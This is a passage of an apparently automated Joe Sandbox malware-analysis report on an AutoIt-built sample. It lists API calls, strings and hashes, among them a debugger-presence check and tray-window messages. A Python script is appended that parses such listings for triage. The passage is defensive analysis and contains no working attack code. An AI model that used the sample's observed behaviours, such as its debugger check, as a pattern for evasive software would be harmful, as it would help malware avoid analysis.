            • Instruction Fuzzy Hash: 93E02B02601231109271127E9DC2EBF7AC9CFD5650710182FFAC1C2266EFA8DD9193A0
            APIs
            • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 01000B23
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: Message
            • String ID: AutoIt$Error allocating memory.
            • API String ID: 2030045667-4017498283
            • Opcode ID: 631d09cf3f9ce11337726f51943408a4233293ebcbe5235e34b2e1618a32c411
            • Instruction ID: 754864ace8222d57245411058d63cb41156d5624465e4149774b387da3d12a6d
            • Opcode Fuzzy Hash: 631d09cf3f9ce11337726f51943408a4233293ebcbe5235e34b2e1618a32c411
            • Instruction Fuzzy Hash: 5BE0D83124431836E11436557D03FC97A888F05B51F10042BFBD4E94C38ADA645016A9
            APIs
              • Part of subcall function 00FBF7C9: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00FC0D71,?,?,?,00FA100A), ref: 00FBF7CE
            • IsDebuggerPresent.KERNEL32(?,?,?,00FA100A), ref: 00FC0D75
            • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00FA100A), ref: 00FC0D84
            Strings
            • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00FC0D7F
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
            • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
            • API String ID: 55579361-631824599
            • Opcode ID: b979954fceaaba7d14944f75518f2c0590bf272eb2a874390c7cafc329b58429
            • Instruction ID: 49bba7fc267f806e4c5683d5e23dde69392a15f72a970e919984f4d4906cc1a6
            • Opcode Fuzzy Hash: b979954fceaaba7d14944f75518f2c0590bf272eb2a874390c7cafc329b58429
            • Instruction Fuzzy Hash: EDE092746003528BE3309FB9E605B427BE8AF00B44F00896EE8C7D7645DFB9E4499BA1
            APIs
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: LocalTime
            • String ID: %.3d$X64
            • API String ID: 481472006-1077770165
            • Opcode ID: 3a4db132c852887733a0a7f5434380be06dd9505f356a5ee49961a83f9e62af1
            • Instruction ID: b994620ce3e5a718cf61c3625e1188e958367458fb0169a9af4a9b518e27c79a
            • Opcode Fuzzy Hash: 3a4db132c852887733a0a7f5434380be06dd9505f356a5ee49961a83f9e62af1
            • Instruction Fuzzy Hash: 52D0127280411DE9CB50A6D1CC45AF9B37DAF09341F508452FA06E1010E628C5087BA2
            APIs
            • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0103232C
            • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 0103233F
              • Part of subcall function 0100E97B: Sleep.KERNEL32 ref: 0100E9F3
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: FindMessagePostSleepWindow
            • String ID: Shell_TrayWnd
            • API String ID: 529655941-2988720461
            • Opcode ID: 9e7aaee6785f590316b630a8ad4d859b0049abcf0cb9cefe606191d84ec0dac0
            • Instruction ID: f61d819e3be94f23a1dfd94b9eddb73a33f253d91d532fe47b72869b19b9cd45
            • Opcode Fuzzy Hash: 9e7aaee6785f590316b630a8ad4d859b0049abcf0cb9cefe606191d84ec0dac0
            • Instruction Fuzzy Hash: 85D0C936394310B6F674A671DD0EFC67A18AB14B10F00491676C5FA1C4D9BAA8419B54
            APIs
            • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0103236C
            • PostMessageW.USER32(00000000), ref: 01032373
              • Part of subcall function 0100E97B: Sleep.KERNEL32 ref: 0100E9F3
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: FindMessagePostSleepWindow
            • String ID: Shell_TrayWnd
            • API String ID: 529655941-2988720461
            • Opcode ID: 29c0acdee742bed6c32db6cde39c941c74b610e512f45d34dadb68ddecb40047
            • Instruction ID: c954c8032072871ed496fff62ec7a78d4b013096421841142d7edb2d5b1de389
            • Opcode Fuzzy Hash: 29c0acdee742bed6c32db6cde39c941c74b610e512f45d34dadb68ddecb40047
            • Instruction Fuzzy Hash: 4AD0C9323953107AF674A671DD0EFC67618AB15B10F00491676C5FA1C4D9BAA8419B54
            APIs
            • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,?,?,00000000,?,?,?,?,?,00000000,?), ref: 00FDBE93
            • GetLastError.KERNEL32 ref: 00FDBEA1
            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00FDBEFC
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: ByteCharMultiWide$ErrorLast
            • String ID:
            • API String ID: 1717984340-0
            • Opcode ID: 2aebfdc736b5c93422de58d18da1a5c6c5755423e08fb0542c0eb8ea953143c9
            • Instruction ID: 907908d80b064ade66a0c951c2bf11dac65ea5d9f461ca8b01a5b5e4fe7c47d5
            • Opcode Fuzzy Hash: 2aebfdc736b5c93422de58d18da1a5c6c5755423e08fb0542c0eb8ea953143c9
            • Instruction Fuzzy Hash: E041E935A04246EFDF218FA5CC44BBA7BA6DF41320F1A415AF95997391DB318D00FB60
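Added triage helper (an example written for this page, not part of the Joe Sandbox report or its tooling): the per-function "APIs" entries above are long to read by hand, so this Python script parses lines in that exact shape into records, separates a function's own calls from "Part of subcall function" calls, and names the window-message and WinINet option constants that appear as raw hex arguments. The sample input is constructed from a few of the entries above; the message names are standard user32 values and 0x32 is the standard wininet INTERNET_OPTION_CONNECTED_STATE, whose INTERNET_CONNECTED_INFO argument is 8 bytes long, matching the 00000008 length passed to InternetSetOptionW above. Only constants that occur in the listing are decoded; everything else is left as the raw value.

```python
"""Parse Joe Sandbox "APIs" function entries into records for bulk triage."""
import re
from collections import defaultdict

# Constructed sample input, copied in the shape of the "APIs" blocks in the report.
SAMPLE = """\
APIs
  • Part of subcall function 00FA600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00FA604C
  • Part of subcall function 00FA600E: GetStockObject.GDI32(00000011), ref: 00FA6060
  • Part of subcall function 00FA600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 00FA606A
• GetWindowRect.USER32(00000000,?), ref: 0103377A
• GetSysColor.USER32(00000012), ref: 01033794
APIs
• InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0101CD7D
• InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 0101CDA6
APIs
• MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 01000B23
APIs
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0103232C
• PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 0103233F
  • Part of subcall function 0100E97B: Sleep.KERNEL32 ref: 0100E9F3
"""

# One bullet per call. The argument list is optional (e.g. "Sleep.KERNEL32 ref: ...").
CALL_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<callee>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[A-Za-z_][A-Za-z0-9_]*)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

# Standard user32 message values for the Send/PostMessageW calls in the listing.
MSG_NAMES = {
    0x0030: "WM_SETFONT",
    0x00B1: "EM_SETSEL",
    0x0111: "WM_COMMAND",
    0x0180: "LB_ADDSTRING",
    0x0182: "LB_DELETESTRING",
    0x018B: "LB_GETCOUNT",
}
# Standard wininet option value seen in the InternetSetOptionW call.
INET_OPTIONS = {0x32: "INTERNET_OPTION_CONNECTED_STATE"}


def parse_arg(token):
    """'?' is an unresolved value; 8 hex digits become an int; anything else is a literal."""
    token = token.strip()
    if token == "?":
        return None
    if re.fullmatch(r"[0-9A-Fa-f]{8}", token):
        return int(token, 16)
    return token


def parse_entries(text):
    """Split the listing at each 'APIs' header; return one list of call records per function."""
    entries = []
    for line in text.splitlines():
        if line.strip() == "APIs":
            entries.append([])
            continue
        m = CALL_RE.match(line)
        if not m or not entries:
            continue
        raw_args = m.group("args")
        entries[-1].append({
            "api": m.group("api"),
            "module": m.group("module"),
            "args": [] if raw_args is None else [parse_arg(a) for a in raw_args.split(",")],
            "ref": int(m.group("ref"), 16),
            "via_subcall": m.group("callee") is not None,
        })
    return entries


def api_signature(entry):
    """Sorted, de-duplicated names of the function's own (non-subcall) API calls."""
    return sorted({c["api"] for c in entry if not c["via_subcall"]})


def decode_message_calls(entry):
    """(ref, message name) for every Send/PostMessageW call, including subcalls."""
    out = []
    for c in entry:
        if c["api"] in ("SendMessageW", "PostMessageW") and len(c["args"]) >= 2:
            msg = c["args"][1]
            name = MSG_NAMES.get(msg, f"0x{msg:04X}") if isinstance(msg, int) else "?"
            out.append((c["ref"], name))
    return out


def decode_inet_options(entry):
    """(ref, option name) for every InternetSetOptionW call."""
    return [(c["ref"], INET_OPTIONS.get(c["args"][1], "unknown"))
            for c in entry if c["api"] == "InternetSetOptionW" and len(c["args"]) >= 2]


def modules_used(entries):
    """How many functions make a direct call into each import module."""
    counts = defaultdict(int)
    for entry in entries:
        for mod in {c["module"] for c in entry if not c["via_subcall"]}:
            counts[mod] += 1
    return dict(counts)


if __name__ == "__main__":
    parsed = parse_entries(SAMPLE)
    for i, entry in enumerate(parsed):
        print(i, api_signature(entry), decode_message_calls(entry), decode_inet_options(entry))
    print(modules_used(parsed))
```

Feed it the text of a whole function listing and the WININET count alone separates the handful of network-capable functions from the GUI and CRT helpers that make up most of an AutoIt runtime; the decoded constants then say what those functions do with the handle without opening each one in a disassembler.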